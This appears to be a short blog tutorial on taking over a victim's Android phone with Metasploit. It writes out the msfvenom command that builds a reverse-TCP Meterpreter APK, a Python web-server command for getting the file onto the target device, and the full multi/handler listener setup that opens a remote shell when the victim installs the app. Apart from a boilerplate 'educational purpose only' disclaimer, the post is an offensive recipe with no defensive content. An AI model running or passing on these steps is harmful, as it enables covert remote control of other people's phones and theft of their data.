Exploiting Android…

Sampath Pendurthi
3 min readNov 8, 2020

Hello everyone,Let’s Hack some android phones by using an Apk created by me.So,For this we need to create an apk using msfvenom and send it to the victim’s phone.This is the Basic Method To hack an Android phone.

Disclaimer:

THIS IS FOR EDUCATIONAL PURPOSE ONLY.I’M NOT RESPONSIBLE FOR THE THINGS YOU DO.PLEASE USE THIS FOR GOOD.

STEP-1:

Our First is to create a payload to send it to the victim,The payload may be a pdf,image,apk,xml or DLL.To Hack android i’m going to create a apk.For this we can use backdoor-apk,FATRAT,veil-evasion,msfvenom…etc…,

For this writeup,i’m going to use msfvenom.In the coming writeup i’m going to use fatrat for creating a payload.

For Creating a payload i’m going to use msfvenom..

“msfvenom -p android/meterpreter/reverse_tcp lhost=<ur_ip> lport=1234 > test.apk”

Now,Let’s move the apk into the android phone.For this i’m using the python module to carry the apk into the android.

“python -m SimpleHTTPServer”

SO download the apk in your android phone.

STEP-2:

We’ve created and transfered the apk successfully.Now we have to create a listener to grab the incoming traffic from the payload that is installed in the android phone.

For that type the following in the terminal.

“msfconsole”

Now we are going to setup the multi/hander to get a meterpreter session.

“use exploit/multi/handler”

“set payload android/meterpreter/reverse_tcp”

“set LHOST <ur_ip>”

“set LPORT 1234”

“exploit”

So we’ve successfully created a listener.When the victim opens the apk,we’ll get the meterpreter session.

OK we’ve got the meterpreter shell now just perform some basic actions .

so that’s it.In the coming writeup we’ll use fatrat to create an apk and do some fun stuff.

Disclaimer:

THIS IS FOR EDUCATIONAL PURPOSE ONLY.I’M NOT RESPONSIBLE FOR THE THINGS YOU DO.PLEASE USE THIS FOR GOOD.

THANK YOU…
HAPPY HACKING….

PEACE……✌️✌️

Follo for more stuff :

Github:https://github.com/LetMeHackYou

instagram:https://www.instagram.com/sampath.pendurthi/

--

--